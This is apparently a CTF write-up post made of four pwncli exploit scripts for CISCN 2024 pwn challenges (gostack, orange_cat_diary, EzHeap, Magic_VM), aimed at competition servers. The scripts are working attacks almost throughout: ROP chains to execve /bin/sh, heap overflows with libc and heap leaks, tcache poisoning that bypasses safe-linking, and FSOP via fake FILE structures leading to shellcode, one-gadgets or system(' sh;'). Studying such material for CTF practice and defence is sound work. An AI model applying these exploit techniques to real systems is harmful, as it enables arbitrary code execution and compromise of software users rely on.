先贴个exp,有空补充详细

gostack

from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "122"]

# `if 1:` always takes the remote branch; set the constant to 0 to use the
# local `process('./gostack')` branch instead.
if 1:
    addr = '8.147.129.121:30388'
    host = addr.split(':')
    # NOTE(review): the port is passed as the str produced by split(); the
    # remote() wrapper is assumed to coerce it to int — confirm.
    gift.io = remote(host[0], host[1])
    gift.debug = False
else:
    gift.io = process('./gostack')
init_x64_context(gift.io, gift)
load_libc('/usr/lib/x86_64-linux-gnu/libc.so.6')
libc: ELF = gift['libc']
gift.elf = ELF('./gostack')
# gdb breakpoint script; only used if the launch_gdb(cmd) call below is
# uncommented.
cmd = '''
b *0x4a0a9e
b *0x4A09C6
c
'''
# launch_gdb(cmd)

CG.set_find_area(True, False)

# Absolute addresses inside ./gostack.  No base address is computed before
# they are used, so the binary is presumably loaded at a fixed address —
# verify against the ELF headers if the chain does not work.
# Only rax, rdi_6, rsi, rdx and syscall_ret are referenced further down; the
# remaining constants are unused in this script.
sys_write = 0x46A380
sys_read = 0x46A180
sys_mmap = 0x46A980
syscall = 0x404043
sh = 0x4A3423
# 4a18a5 : pop rdi ; pop r14 ; pop r13 ; pop r12 ; pop rbp ; pop rbx ; ret
rdi_6 = 0x4A18A5
rax = 0x40F984
rbx = 0x40C321
rcx = 0x420D6D
rsi = 0x42138A
rdx = 0x4944EC
fmt_printf = 0x4914C0
# 49172f : pop rax ; mov rcx, rdx ; call rsi
# 4600c7 : xchg rcx, rax ; ret
xchg_rcx_rax = 0x4600C7
# 460147 : xchg r8, rax ; ret
xchg_r8_rax = 0x460147
prax_mrcx_rdx_callrsi = 0x49172F
syscall_ret = 0x4616C9

ru(b'Input your magic message :')
# Buffer contents before the gadget chain: a NUL-terminated "/bin/sh" at the
# start, filler, then four qwords.  The 0xC000... values look like Go runtime
# pointers that must survive the overwrite — inferred from their shape,
# confirm in gdb with the breakpoints above.
payload = (
    b'/bin/sh\x00'
    + cyclic(0x100 - 0x8)
    + p64_ex(0xC00000C600)
    + p64_ex(0x108)
    + p64_ex(0x4AA800)
    + p64_ex(0xC000012360)
)
# Pad to the offset at which the gadget chain starts.
payload = payload.ljust(0x1D0, b'\x00')

# Chain 1: rax=0, rdi=0 (rdi_6 pops six registers, all zeroed here),
# rsi=0x564000, rdx=0x10, then syscall_ret.  On x86-64 Linux rax=0 is read,
# so this reads 0x10 bytes from fd 0 into 0x564000.
payload += (
    p64_ex(rax)
    + p64_ex(0)
    + p64_ex(rdi_6)
    + p64_ex(0)
    + p64_ex(0) * 5
    + p64_ex(rsi)
    + p64_ex(0x564000)
    + p64_ex(rdx)
    + p64_ex(0x10)
    + p64_ex(syscall_ret)
)
# Chain 2: rax=59, rdi=0x564000, rsi=0, rdx=0, then syscall_ret.  rax=59 is
# execve, with the path taken from the bytes chain 1 read into 0x564000.
payload += (
    p64_ex(rax)
    + p64_ex(59)
    + p64_ex(rdi_6)
    + p64_ex(0x564000)
    + p64_ex(0) * 5
    + p64_ex(rsi)
    + p64_ex(0)
    + p64_ex(rdx)
    + p64_ex(0)
    + p64_ex(syscall_ret)
)

sl(payload)
ru(b'mess')
# The bytes consumed by chain 1's read.
s(b'/bin/sh\x00')

ia()

orange_cat_diary

from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "122"]

# `if 1:` always takes the remote branch; set the constant to 0 to use the
# local `process('./orange_cat_diary')` branch instead.
if 1:
    addr = '8.147.128.251:43478'
    host = addr.split(':')
    # NOTE(review): the port is passed as the str produced by split(); the
    # remote() wrapper is assumed to coerce it to int — confirm.
    gift.io = remote(host[0], host[1])
    gift.debug = False
else:
    gift.io = process('./orange_cat_diary')
init_x64_context(gift.io, gift)
# The leak offsets used below (0x3c4b78, 0x3c4aed) belong to this libc build.
load_libc('./libc-2.23.so')
libc: ELF = gift['libc']
gift.elf = ELF('./orange_cat_diary')
# gdb breakpoint script (PIE-relative); only used if launch_gdb(cmd) is
# uncommented further down.
cmd = '''
b *$rebase(0xCAD)
b *$rebase(0xC52)
b *$rebase(0xE29)
b *$rebase(0xDAE)
b *$rebase(0xD57)
c
'''

def add(len, data):
    """Menu action 1: submit a length, then the entry body.

    *len* is sent as its decimal string and *data* verbatim.  The parameter
    name shadows the ``len`` builtin; it is kept unchanged for callers.
    """
    menu_prompt = b'Please input your choice:'
    field_prompt = b'content:'
    sla(menu_prompt, b'1')
    sa(field_prompt, str(len))
    sa(field_prompt, data)

def edit(len, data):
    """Menu action 4: submit a length, then the replacement body.

    *len* is sent as its decimal string and *data* verbatim; nothing here
    ties *len* to the length originally allocated with add().
    """
    menu_prompt = b'Please input your choice:'
    field_prompt = b'content:'
    sla(menu_prompt, b'4')
    sa(field_prompt, str(len))
    sa(field_prompt, data)

def show():
    """Select menu action 2 (show); the program's output is left for the caller to read."""
    choice = b'2'
    sla(b'Please input your choice:', choice)

def dele():
    """Select menu action 3 (delete); takes no index, so it acts on whatever the program considers current."""
    choice = b'3'
    sla(b'Please input your choice:', choice)


sla(b'name.', b'/bin/sh')
add(0x68, b'inkey')
# edit() writes 0x70 bytes into a 0x68-byte entry: the 8 bytes past the end
# become 0xf91 — presumably the size field of the following chunk; confirm
# with the breakpoints in `cmd`.
edit(0x70, b'a' * 0x68 + p64_ex(0xf91))
add(0x8a1, b'i')
add(0x8a1, b'i')
add(0x6b0, b'\x78')
show()
# Leak: take the last 6 bytes up to the first 0x7f and subtract the
# libc-2.23 offset 0x3c4b78 to recover the base.
libc_base = u64_ex(ru(b'\x7f')[-6:]) - 0x3c4b78
set_current_libc_base_and_log(libc_base)

add(0x68, b'i')
dele()
# Writes 8 bytes into the just-deleted entry; the value is libc_base+0x3c4aed.
edit(8, p64_ex(libc_base + 0x3c4aed))
add(0x68, b'i')
add(0x68, b'i')
# 0x13 bytes of padding, then the second one-gadget address from the helper.
edit(0x40, b'a' * 0x13 + p64_ex(get_current_one_gadget_from_libc()[1]))
# launch_gdb(cmd)
# Final allocation request; the size is sent as b'20' here, unlike add()
# which sends str(len) — intentional or not, the server sees the same digits.
sla(b'Please input your choice:', b'1')
sa(b'content:', b'20')

ia()

EZHEAP

from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "122"]

# `if 1:` always takes the remote branch; set the constant to 0 to use the
# local `process('./EzHeap')` branch instead.
if 1:
    addr = '8.147.133.230:30034'
    host = addr.split(':')
    # NOTE(review): the port is passed as the str produced by split(); the
    # remote() wrapper is assumed to coerce it to int — confirm.
    gift.io = remote(host[0], host[1])
    gift.debug = False
else:
    gift.io = process('./EzHeap')
init_x64_context(gift.io, gift)
# Absolute path on the author's machine; the libc offsets used below
# (0x21ADC0, 0xA0265, 0x42946, 0x5A120) belong to this specific build.
load_libc('/home/inkey/pwn/ciscn2024初赛/EzHeap/libc.so.6')
libc: ELF = gift['libc']
gift.elf = ELF('./EzHeap')
# gdb breakpoint script (PIE-relative); only used if launch_gdb(cmd) is
# uncommented further down.
cmd = '''
b *$rebase(0x16B3)
b *$rebase(0x1773)
b *$rebase(0x18CD)
b *$rebase(0x19B6)
b _IO_flush_all_lockp
c
'''


def add(size, content):
    """Menu action 1: request an entry of *size* bytes and send *content* for it."""
    sla(b'>>', b'1')
    size_prompt, body_prompt = b'size:', b'content'
    sla(size_prompt, str(size))
    sa(body_prompt, content)


def dele(idx):
    """Menu action 2: delete the entry at index *idx* (sent as a decimal string)."""
    choice = b'2'
    sla(b'>>', choice)
    sla(b'idx:', str(idx))


def edit(idx, size, content):
    """Menu action 3: overwrite entry *idx* with *size* bytes of *content*.

    The size is sent separately from the content, so nothing here ties it
    to the size the entry was created with.
    """
    sla(b'>>', b'3')
    for prompt, value in ((b'idx:', str(idx)), (b'size:', str(size))):
        sla(prompt, value)
    sa(b'content', content)


def show(idx):
    """Menu action 4: select entry *idx*; its output is left for the caller to read."""
    choice = b'4'
    sla(b'>>', choice)
    sla(b'idx:', str(idx))


# Unused in this script (heap_base below is the value actually used).
heap = 0x4060

add(0x100, b'inkey0')
add(0x100, b'inkey1')
add(0x100, b'inkey2')
add(0x100, b'inkey3')
dele(1)
# edit() writes 0x110 bytes into a 0x100-byte entry, so show(0) prints past
# the entry's end into the freed neighbour.
edit(0, 0x110, b'a' * 0x110)
show(0)
ru(b'a' * 0x110)
# Heap leak: the bytes up to the next 'Wel' prompt, shifted left by 12 —
# consistent with a safe-linking-style pointer; confirm against the libc.
heap_base = u64_ex(ru(b'Wel', drop=True)) << 12
log_heap_base_addr(heap_base)
# Restore the 0x110 value at offset 0x108 that the leak step overwrote.
edit(0, 0x110, b'\x00' * 0x108 + p64_ex(0x110))

add(0x100, b'inkey1')
dele(2)
dele(1)


# Writes one qword past the 0x110 value: protect_ptr(heap_base+0x420, ...)
# places an encoded pointer in the freed entry 1.
edit(
    0,
    0x118,
    b'\x00' * 0x108
    + p64_ex(0x110)
    + p64_ex(protect_ptr(heap_base + 0x420, heap_base - 0x1B70 - 0x110)),
)
add(0x100, b'inkey1')
add(0x100, b'inkey2')
edit(2, 0x110, b'a' * 0x110)
show(2)
# Libc leak: last 6 bytes up to the first 0x7f minus the build's offset.
libc_base = u64_ex(ru(b'\x7f')[-6:]) - 0x21ADC0
set_current_libc_base_and_log(libc_base)


IO_list_all = libc.sym._IO_list_all
log_address_ex2(IO_list_all)

add(0x10, b'inkey4')
add(0x200, b'heap')
# Heap address at which the `payload` built below is placed (via entry 5).
fake_IO = heap_base + 0x750

# Same pattern as above: 0x2A8 bytes of zeros, a 0x20 size value, then an
# encoded pointer aimed at IO_list_all - 0x20.
edit(
    4,
    0x2C0,
    b'\x00' * 0x2A8
    + p64_ex(0x20)
    + p64_ex(protect_ptr(heap_base + 0x8C0, IO_list_all - 0x20)),
)
add(0x10, b'inkey6')
add(0x10, b'inkey7')
# Entry 7's data at offset 0x20 now holds fake_IO.
edit(7, 0x28, b'\x00' * 0x20 + p64_ex(fake_IO))

_IO_wfile_jumps = libc.sym._IO_wfile_jumps
CG.set_find_area(False, True)

# Gadget chain: mprotect(fake_IO + 0x280 - 0x9d0, 0x2000, 7), then return
# into fake_IO + 0x280 where `shellcode` is placed by the flat() below.
orw = (
    p64_ex(CG.pop_rdi_ret())
    + p64_ex(fake_IO + 0x280 - 0x9d0)
    + p64_ex(CG.pop_rsi_ret())
    + p64_ex(0x2000)
    + p64_ex(CG.pop_rdx_rbx_ret())
    + p64_ex(0x7) * 2
    + p64_ex(libc.sym.mprotect)
    + p64_ex(fake_IO + 0x280)
)

# open('/flag'), read 0x50 bytes into fake_IO + 0x190, write them to stdout.
# NOTE(review): fd 3 is hard-coded as open()'s result; this assumes no other
# descriptor is open in the target at that point.
shellcode = shellcraft.open('/flag') + shellcraft.read(3, fake_IO + 0x190, 0x50) + shellcraft.write(1, fake_IO + 0x190, 0x50)
shellcode = asm(shellcode)

# Fake structure laid out by offset; the libc offsets (0xA0265, 0x42946,
# 0x5A120) are specific to the libc loaded above.  0x190 holds the path
# string read by the shellcode, 0x1A0 the gadget chain, 0x280 the shellcode.
payload = flat(
    {
        0x0: 0,
        0x20: p64_ex(libc_base + 0xA0265),
        0x28: p64_ex(libc_base + 0xA0265 + 0x100),
        0xA0: p64_ex(fake_IO + 0x20),
        0xD8: p64_ex(_IO_wfile_jumps),
        0x38: p64_ex(0),
        0x50: p64_ex(0),
        0x80: p64_ex(libc_base + 0x42946),
        0x100: p64_ex(fake_IO + 0x110),
        0x178: p64_ex(libc_base + 0x5A120),
        0x190: b'/flag\x00',
        0x1A0: orw,
        0x280: shellcode,
    },
    filler=b'\x00',
)
# launch_gdb(cmd)
# Entry 5 is the 0x200-byte 'heap' allocation; 0x400 bytes are written into
# it.  Menu action 5 then triggers the flush breakpoint named in `cmd`.
edit(5, 0x400, payload)
sla(b'>>', b'5')


ia()

Magic_VM

from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "160"]

# `if 1:` always takes the remote branch; set the constant to 0 to use the
# local `process('./ezvm')` branch instead.
if 1:
    addr = '8.147.133.80:15926'
    host = addr.split(':')
    # NOTE(review): the port is passed as the str produced by split(); the
    # remote() wrapper is assumed to coerce it to int — confirm.
    gift.io = remote(host[0], host[1])
    gift.debug = False
else:
    gift.io = process('./ezvm')
init_x64_context(gift.io, gift)
# Absolute path on the author's machine; the offsets used in the vm()
# calls below belong to this specific build.
load_libc('/home/inkey/pwn/ciscn2024初赛/magic_vm/libc.so.6')
libc: ELF = gift['libc']
gift.elf = ELF('./ezvm')

# Leftover breakpoint list; a bare string, so it has no effect at runtime.
'''
b *$rebase(0x181B)
b *$rebase(0x192D)
b *$rebase(0x1B01)
'''
# gdb script actually used if launch_gdb(cmd) is uncommented further down.
cmd = '''


b *$rebase(0x1CB2)
b _IO_flush_all_lockp

c
'''

# Accumulated VM bytecode; every vm() call appends one instruction.
payload = b''

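def vm(opcode, arg1=0, arg2=0, arg3=0):
    """Append one encoded VM instruction to the module-level ``payload``.

    Encoding (offsets into the instruction, zero-filled by ``flat``):
      0x0  opcode byte
      0x1  arg1 byte
      0x2  arg2 byte
      0x3  arg3, packed by ``flat`` (an int is word-packed; bytes verbatim)

    Opcode 11 carries only the opcode byte; opcodes 9 and 10 carry the
    opcode and the two one-byte arguments; every other opcode carries all
    four fields.  The original had identical branches for opcode 5 and the
    default case — they are merged here without changing the output.

    Args:
        opcode: instruction number (see the opcode table below the function).
        arg1, arg2: one-byte operands (defaults 0).
        arg3: immediate / packed operand (default 0).

    Side effect: extends the global ``payload``; returns nothing.
    """
    global payload
    fields = {0x0: p8_ex(opcode)}
    if opcode != 11:
        fields[0x1] = p8_ex(arg1)
        fields[0x2] = p8_ex(arg2)
        if opcode not in (9, 10):
            fields[0x3] = arg3
    payload += flat(fields, filler=b'\x00')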

'''
type
1:p64
2:reg
3:addr_off

arg1 type

opcode

1 +
2 -
3 <<
4 >>
5 =
6 &
7 |
8 ^
9 POP
10 PUSH
11 init

'''

# Five extra continues for the gdb script.
cmd += 'c\n' * 5

# arg1 values below are built as `low + (high << 2)`; by the type table
# above this appears to pack two operand types into one byte (low two bits
# and bits 2+).  Inferred from usage — confirm against the VM's decoder.
# The large constants look like offsets relative to a libc address held in
# a VM register (the inline comments name the symbols they reach); they are
# specific to the libc loaded above.  The trailing numbers in comments
# count instructions emitted so far.
vm(5, 2 + (1 << 2), 1, p64_ex(0x225980 - 0x2000))
vm(11)
vm(5, 2 + (3 << 2), 3, p8_ex(1)) # 0x7fa5ca334960 (__strnlen_avx2)
vm(11)
vm(11)

vm(2, 2 + (1 << 2), 3, p64_ex(0x2220c0 - 0x2000)) # 6
vm(11)
vm(11) # reg3 --> addr_base

vm(5, 2 + (1 << 2), 1, p64_ex(0))
vm(11)
vm(11)

vm(5, 2 + (1 << 2), 1, p64_ex(0x224680)) # 12
vm(11)
vm(5, 3 + (2 << 2), 1, p8_ex(3)) # addr --> _IO_list_all
vm(11)
vm(11)

# 16 (17-1)
vm(5, 2 + (1 << 2), 1, p64_ex(0xd8))
vm(1, 2 + (1 << 2), 3, p64_ex(0x2200c0)) # reg3 --> _IO_wfile_jumps
vm(11)
vm(11)
vm(5, 3 + (2 << 2), 1, p8_ex(3)) # fake_IO + 0xd8 --> reg3
vm(11)
vm(11)

# 23
vm(5, 2 + (1 << 2), 1, p64_ex(0x368))
vm(2, 2 + (1 << 2), 3, p64_ex(0x12b43f)) # reg3 --> onegadget 0x12b43f
vm(11)
vm(11)
vm(5, 3 + (2 << 2), 1, p8_ex(3)) # fake_IO + 0x368 --> reg3
vm(11)
vm(11)

#30
vm(2, 2 + (1 << 2), 3, p64_ex(0xf4c81 - 0x200)) # reg3 --> fake_IO + 0x200
vm(5, 2 + (1 << 2), 1, p64_ex(0xa0))
vm(11)
vm(11)
vm(5, 3 + (2 << 2), 1, p8_ex(3)) # fake_IO + 0xa0 --> reg3
vm(11)
vm(11)

# 37
vm(1, 2 + (1 << 2), 3, p64_ex(0x100)) # reg3 --> fake_IO + 0x300
vm(5, 2 + (1 << 2), 1, p64_ex(0x2e0))
vm(11)
vm(11)
vm(5, 3 + (2 << 2), 1, p8_ex(3)) # fake_IO + 0x2e0 --> reg3
vm(11)
vm(11)

# 44 + 3
vm(5, 2 + (1 << 2), 1, p64_ex(0x28))
vm(11)
vm(11)
vm(5, 3 + (1 << 2), 1, p64_ex(0x1000)) # fake_IO + 0x28 --> 0x1000
vm(11)
vm(11) # 51

vm(1, 2 + (1 << 2), 3, p64_ex(0x59a70)) # reg3 --> libc.sym.system
vm(11)
vm(11)
vm(5, 2 + (1 << 2), 1, p64_ex(0x368))
vm(11)
vm(11)
vm(5, 3 + (2 << 2), 1, p8_ex(3)) # fake_IO + 0x368 --> reg3
vm(11)
vm(11)

vm(5, 2 + (1 << 2), 1, p64_ex(0))
vm(11)
vm(11)
# NOTE(review): this arg3 is 7 bytes; flat() pads it to the field width.
# The trailing comment was copied from the block above and does not
# describe this store (it writes a string, not reg3).
vm(5, 3 + (1 << 2), 1, b' sh;\x00\x00\x00') # fake_IO + 0x368 --> reg3
vm(11)
vm(11)


# launch_gdb(cmd)
# The whole accumulated bytecode is sent once, after the prompt.
sa(b'plz input your vm-code', payload)

ia()